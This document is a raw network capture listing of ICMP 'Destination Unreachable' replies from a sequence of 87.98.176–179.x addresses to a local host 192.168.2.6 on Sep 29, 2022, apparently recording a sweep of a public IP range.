Sep 29, 2022 14:50:33.594151974 CEST	87.98.176.151	192.168.2.6	c7cc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.598433971 CEST	87.98.176.190	192.168.2.6	c7f3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.599522114 CEST	87.98.176.200	192.168.2.6	c7fd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.601046085 CEST	87.98.176.215	192.168.2.6	c80c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.601692915 CEST	87.98.176.147	192.168.2.6	c7c8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.601711988 CEST	87.98.176.150	192.168.2.6	c7cb	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.601798058 CEST	87.98.176.156	192.168.2.6	c7d1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.601922989 CEST	87.98.176.158	192.168.2.6	c7d3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.602039099 CEST	87.98.176.221	192.168.2.6	c812	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.602561951 CEST	87.98.176.164	192.168.2.6	c7d9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.602816105 CEST	87.98.176.163	192.168.2.6	c7d8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.603300095 CEST	87.98.176.171	192.168.2.6	c7e0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.603929996 CEST	87.98.176.169	192.168.2.6	c7de	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.604590893 CEST	87.98.176.178	192.168.2.6	c7e7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.604644060 CEST	87.98.176.185	192.168.2.6	c7ee	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.606174946 CEST	87.98.176.184	192.168.2.6	c7ed	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.606385946 CEST	87.98.176.193	192.168.2.6	c7f6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.606928110 CEST	87.98.176.203	192.168.2.6	c800	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.606970072 CEST	87.98.176.196	192.168.2.6	c7f9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.607312918 CEST	87.98.176.206	192.168.2.6	c803	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.607572079 CEST	87.98.176.195	192.168.2.6	c7f8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.607682943 CEST	87.98.176.210	192.168.2.6	c807	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.609323978 CEST	87.98.176.219	192.168.2.6	c810	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.610320091 CEST	87.98.176.220	192.168.2.6	c811	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.611498117 CEST	87.98.176.224	192.168.2.6	c815	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.611944914 CEST	87.98.176.225	192.168.2.6	c816	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.612442017 CEST	87.98.176.227	192.168.2.6	c80e	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.612485886 CEST	87.98.176.234	192.168.2.6	c81f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.613100052 CEST	87.98.176.236	192.168.2.6	c821	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.613722086 CEST	87.98.176.241	192.168.2.6	c826	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.613774061 CEST	87.98.176.239	192.168.2.6	c824	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.614048958 CEST	87.98.176.243	192.168.2.6	c821	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.614330053 CEST	87.98.176.242	192.168.2.6	c827	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.614837885 CEST	87.98.176.248	192.168.2.6	c82d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:33.614856005 CEST	87.98.176.246	192.168.2.6	c824	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:33.616740942 CEST	87.98.176.254	192.168.2.6	c833	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.697798967 CEST	87.98.177.47	192.168.2.6	c864	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.699846983 CEST	87.98.177.4	192.168.2.6	c839	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.699922085 CEST	87.98.177.9	192.168.2.6	c83e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.700413942 CEST	87.98.177.13	192.168.2.6	c842	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701155901 CEST	87.98.177.21	192.168.2.6	c84a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701174021 CEST	87.98.177.26	192.168.2.6	c84f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701188087 CEST	87.98.177.83	192.168.2.6	c888	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701325893 CEST	87.98.177.6	192.168.2.6	c83b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701751947 CEST	87.98.177.23	192.168.2.6	c84c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701942921 CEST	87.98.177.88	192.168.2.6	c88d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.701970100 CEST	87.98.177.20	192.168.2.6	c849	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.703067064 CEST	87.98.177.35	192.168.2.6	c858	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.703243017 CEST	87.98.177.39	192.168.2.6	c85c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.703933954 CEST	87.98.177.41	192.168.2.6	c85e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.704173088 CEST	87.98.177.44	192.168.2.6	c861	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.704190969 CEST	87.98.177.107	192.168.2.6	c896	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:34.705143929 CEST	87.98.177.48	192.168.2.6	c865	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.706299067 CEST	87.98.177.135	192.168.2.6	c8bc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.706871033 CEST	87.98.177.61	192.168.2.6	c86b	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:34.707290888 CEST	87.98.177.71	192.168.2.6	c87c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.707328081 CEST	87.98.177.59	192.168.2.6	c870	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.707484007 CEST	87.98.177.63	192.168.2.6	c874	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.707556963 CEST	87.98.177.62	192.168.2.6	c873	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.707571983 CEST	87.98.177.69	192.168.2.6	c87a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.707844973 CEST	87.98.177.67	192.168.2.6	c878	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.708045006 CEST	87.98.177.79	192.168.2.6	c884	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.708204985 CEST	87.98.177.73	192.168.2.6	c87e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.708774090 CEST	87.98.177.75	192.168.2.6	c880	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.709007978 CEST	87.98.177.81	192.168.2.6	c886	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.709316969 CEST	87.98.177.89	192.168.2.6	c88e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.709692001 CEST	87.98.177.86	192.168.2.6	c88b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.709928036 CEST	87.98.177.165	192.168.2.6	c8da	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.710045099 CEST	87.98.177.95	192.168.2.6	c894	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.710159063 CEST	87.98.177.96	192.168.2.6	c895	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.710603952 CEST	87.98.177.92	192.168.2.6	c891	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.711425066 CEST	87.98.177.108	192.168.2.6	c8a1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.711443901 CEST	87.98.177.102	192.168.2.6	c89b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.711807966 CEST	87.98.177.109	192.168.2.6	c8a2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.712049007 CEST	87.98.177.116	192.168.2.6	c8a9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.712565899 CEST	87.98.177.110	192.168.2.6	c8a3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.712876081 CEST	87.98.177.115	192.168.2.6	c8a8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.713741064 CEST	87.98.177.124	192.168.2.6	c8b1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.713757992 CEST	87.98.177.126	192.168.2.6	c8b3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.714049101 CEST	87.98.177.132	192.168.2.6	c8b9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.714385033 CEST	87.98.177.142	192.168.2.6	c8c3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.714617014 CEST	87.98.177.137	192.168.2.6	c8be	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.714644909 CEST	87.98.177.141	192.168.2.6	c8c2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.715634108 CEST	87.98.177.146	192.168.2.6	c8c7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.716350079 CEST	87.98.177.153	192.168.2.6	c8ce	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.716367960 CEST	87.98.177.159	192.168.2.6	c8d4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.716613054 CEST	87.98.177.157	192.168.2.6	c8d2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.718821049 CEST	87.98.177.155	192.168.2.6	c8c9	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:34.718843937 CEST	87.98.177.1	192.168.2.6	c836	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.718859911 CEST	87.98.177.166	192.168.2.6	c8d1	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:34.718873024 CEST	87.98.177.167	192.168.2.6	c8dc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.718899012 CEST	87.98.177.174	192.168.2.6	c8e3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.718915939 CEST	87.98.177.169	192.168.2.6	c8de	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.770647049 CEST	87.98.177.185	192.168.2.6	c8ee	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.772249937 CEST	87.98.177.202	192.168.2.6	c8ff	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.773889065 CEST	87.98.177.214	192.168.2.6	c90b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.779272079 CEST	87.98.177.193	192.168.2.6	c8f6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.779871941 CEST	87.98.177.198	192.168.2.6	c8fb	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.779989958 CEST	87.98.177.203	192.168.2.6	c900	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.780155897 CEST	87.98.177.204	192.168.2.6	c901	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.780925989 CEST	87.98.177.210	192.168.2.6	c907	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.780961990 CEST	87.98.177.211	192.168.2.6	c908	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.780996084 CEST	87.98.177.207	192.168.2.6	c904	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.781029940 CEST	87.98.177.206	192.168.2.6	c903	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.781166077 CEST	87.98.177.220	192.168.2.6	c911	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.781544924 CEST	87.98.177.219	192.168.2.6	c910	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.781960964 CEST	87.98.177.218	192.168.2.6	c90f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.782152891 CEST	87.98.177.215	192.168.2.6	c90c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.783312082 CEST	87.98.177.212	192.168.2.6	c909	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.809706926 CEST	87.98.177.253	192.168.2.6	c932	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.812478065 CEST	87.98.177.230	192.168.2.6	c91b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.815917969 CEST	87.98.177.239	192.168.2.6	c924	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.815957069 CEST	87.98.177.243	192.168.2.6	c928	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.816536903 CEST	87.98.177.244	192.168.2.6	c929	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.817562103 CEST	87.98.177.250	192.168.2.6	c92f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:34.820175886 CEST	87.98.177.233	192.168.2.6	c914	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:36.149032116 CEST	87.98.178.12	192.168.2.6	c941	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.156023026 CEST	87.98.177.255	192.168.2.6	c934	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.156260967 CEST	87.98.178.0	192.168.2.6	c935	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.156374931 CEST	87.98.178.9	192.168.2.6	c93e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.946513891 CEST	87.98.178.27	192.168.2.6	c950	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.951260090 CEST	87.98.178.19	192.168.2.6	c948	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.951766014 CEST	87.98.178.13	192.168.2.6	c942	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.951884985 CEST	87.98.178.22	192.168.2.6	c94b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.951921940 CEST	87.98.178.21	192.168.2.6	c943	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:36.952217102 CEST	87.98.178.25	192.168.2.6	c94e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.952234030 CEST	87.98.178.52	192.168.2.6	c969	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.952495098 CEST	87.98.178.54	192.168.2.6	c96b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.953820944 CEST	87.98.178.29	192.168.2.6	c952	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.953840017 CEST	87.98.178.26	192.168.2.6	c94f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.956490040 CEST	87.98.178.33	192.168.2.6	c956	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.956877947 CEST	87.98.178.37	192.168.2.6	c95a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.957123995 CEST	87.98.178.36	192.168.2.6	c959	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.957242012 CEST	87.98.178.39	192.168.2.6	c95c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.957829952 CEST	87.98.178.38	192.168.2.6	c95b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.957931995 CEST	87.98.178.35	192.168.2.6	c958	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.958821058 CEST	87.98.178.44	192.168.2.6	c961	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.960256100 CEST	87.98.178.55	192.168.2.6	c96c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.960445881 CEST	87.98.178.58	192.168.2.6	c96f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.960808992 CEST	87.98.178.62	192.168.2.6	c973	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.961327076 CEST	87.98.178.59	192.168.2.6	c970	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.961405039 CEST	87.98.178.60	192.168.2.6	c971	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.961724997 CEST	87.98.178.61	192.168.2.6	c972	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.962742090 CEST	87.98.178.69	192.168.2.6	c970	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:36.962800980 CEST	87.98.178.71	192.168.2.6	c97c	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.962966919 CEST	87.98.178.74	192.168.2.6	c97f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.963530064 CEST	87.98.178.76	192.168.2.6	c97a	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:36.964056015 CEST	87.98.178.79	192.168.2.6	c984	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:36.964417934 CEST	87.98.178.81	192.168.2.6	c986	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.085289001 CEST	87.98.178.120	192.168.2.6	c9ad	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.088329077 CEST	87.98.178.90	192.168.2.6	c98f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.088922977 CEST	87.98.178.95	192.168.2.6	c994	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.088963985 CEST	87.98.178.89	192.168.2.6	c98e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.089195967 CEST	87.98.178.97	192.168.2.6	c996	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.090575933 CEST	87.98.178.106	192.168.2.6	c99f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.090607882 CEST	87.98.178.99	192.168.2.6	c998	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.092739105 CEST	87.98.178.121	192.168.2.6	c9ae	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.092930079 CEST	87.98.178.122	192.168.2.6	c9af	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.093343973 CEST	87.98.178.125	192.168.2.6	c9b2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.153059006 CEST	87.98.178.145	192.168.2.6	c9c6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.155491114 CEST	87.98.178.130	192.168.2.6	c9b7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.156173944 CEST	87.98.178.131	192.168.2.6	c9b8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.157238007 CEST	87.98.178.181	192.168.2.6	c9ea	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.157722950 CEST	87.98.178.186	192.168.2.6	c9ef	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.158020020 CEST	87.98.178.176	192.168.2.6	c9e5	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.158147097 CEST	87.98.178.193	192.168.2.6	c9f6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.158457994 CEST	87.98.178.190	192.168.2.6	c9f3	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.160164118 CEST	87.98.178.146	192.168.2.6	c9c7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.161391973 CEST	87.98.178.152	192.168.2.6	c9cd	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.161565065 CEST	87.98.178.148	192.168.2.6	c9c9	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.162739992 CEST	87.98.178.159	192.168.2.6	c9d4	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.163408041 CEST	87.98.178.172	192.168.2.6	c9e1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.163984060 CEST	87.98.178.178	192.168.2.6	c9e7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.164129972 CEST	87.98.178.173	192.168.2.6	c9e2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.164911032 CEST	87.98.178.167	192.168.2.6	c9dc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.165186882 CEST	87.98.178.189	192.168.2.6	c9f2	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.165257931 CEST	87.98.178.183	192.168.2.6	c9ec	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.165458918 CEST	87.98.178.188	192.168.2.6	c9f1	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.165735960 CEST	87.98.178.184	192.168.2.6	c9ed	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.166620016 CEST	87.98.178.194	192.168.2.6	c9f7	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.184858084 CEST	87.98.178.197	192.168.2.6	c9fa	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.184890985 CEST	87.98.178.195	192.168.2.6	c9f8	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.185626984 CEST	87.98.178.199	192.168.2.6	c9fc	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.186482906 CEST	87.98.178.205	192.168.2.6	ca02	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.186511040 CEST	87.98.178.206	192.168.2.6	ca03	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.196088076 CEST	87.98.178.241	192.168.2.6	ca26	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.199071884 CEST	87.98.178.208	192.168.2.6	ca05	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.199100018 CEST	87.98.178.207	192.168.2.6	ca04	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.199656010 CEST	87.98.178.213	192.168.2.6	ca03	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:37.200354099 CEST	87.98.178.212	192.168.2.6	ca02	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:37.200642109 CEST	87.98.178.214	192.168.2.6	ca0b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.201364994 CEST	87.98.178.225	192.168.2.6	ca16	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.202166080 CEST	87.98.178.234	192.168.2.6	ca1f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.202718019 CEST	87.98.178.236	192.168.2.6	ca21	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.202908039 CEST	87.98.178.237	192.168.2.6	ca22	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.203046083 CEST	87.98.178.240	192.168.2.6	ca25	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.203609943 CEST	87.98.178.246	192.168.2.6	ca2b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.205538988 CEST	87.98.178.247	192.168.2.6	ca25	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:37.205981016 CEST	87.98.178.249	192.168.2.6	ca2e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:37.206783056 CEST	87.98.178.251	192.168.2.6	ca26	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:37.207504988 CEST	87.98.178.254	192.168.2.6	ca33	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.152796984 CEST	87.98.179.3	192.168.2.6	ca38	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.158564091 CEST	87.98.178.255	192.168.2.6	ca34	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.158951998 CEST	87.98.179.0	192.168.2.6	ca35	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.160957098 CEST	87.98.179.5	192.168.2.6	ca3a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.160984039 CEST	87.98.179.4	192.168.2.6	ca39	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.161050081 CEST	87.98.179.13	192.168.2.6	ca42	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.168560028 CEST	87.98.179.8	192.168.2.6	ca3d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.169019938 CEST	87.98.179.14	192.168.2.6	ca43	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.169045925 CEST	87.98.179.20	192.168.2.6	ca49	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.169727087 CEST	87.98.179.24	192.168.2.6	ca4d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.170191050 CEST	87.98.179.82	192.168.2.6	ca80	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.170347929 CEST	87.98.179.31	192.168.2.6	ca54	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.170428038 CEST	87.98.179.30	192.168.2.6	ca53	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.171008110 CEST	87.98.179.37	192.168.2.6	ca5a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.171169043 CEST	87.98.179.29	192.168.2.6	ca52	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.171520948 CEST	87.98.179.34	192.168.2.6	ca57	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.171881914 CEST	87.98.179.45	192.168.2.6	ca62	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.171955109 CEST	87.98.179.44	192.168.2.6	ca61	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.172168016 CEST	87.98.179.41	192.168.2.6	ca5e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.172521114 CEST	87.98.179.106	192.168.2.6	ca9f	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.172542095 CEST	87.98.179.53	192.168.2.6	ca6a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.173080921 CEST	87.98.179.51	192.168.2.6	ca68	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.173125982 CEST	87.98.179.56	192.168.2.6	ca6d	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.173187017 CEST	87.98.179.50	192.168.2.6	ca67	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.173274994 CEST	87.98.179.54	192.168.2.6	ca6b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.173315048 CEST	87.98.179.58	192.168.2.6	ca68	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.175391912 CEST	87.98.179.60	192.168.2.6	ca6a	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.175717115 CEST	87.98.179.66	192.168.2.6	ca77	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.176268101 CEST	87.98.179.70	192.168.2.6	ca7b	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.176799059 CEST	87.98.179.69	192.168.2.6	ca7a	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.177226067 CEST	87.98.179.78	192.168.2.6	ca83	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.177648067 CEST	87.98.179.153	192.168.2.6	cace	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.177680969 CEST	87.98.179.76	192.168.2.6	ca81	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.177895069 CEST	87.98.179.80	192.168.2.6	ca85	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.178669930 CEST	87.98.179.93	192.168.2.6	ca92	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.178770065 CEST	87.98.179.96	192.168.2.6	ca95	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.179569960 CEST	87.98.179.99	192.168.2.6	ca98	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.180243969 CEST	87.98.179.105	192.168.2.6	ca9e	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.181092024 CEST	87.98.179.107	192.168.2.6	caa0	(Port unreachable)	Destination Unreachable
Sep 29, 2022 14:50:48.181214094 CEST	87.98.179.109	192.168.2.6	ca9b	(Unknown)	Destination Unreachable
Sep 29, 2022 14:50:48.181328058 CEST	87.98.179.119	192.168.2.6	caac	(Port unreachable)	Destination Unreachable
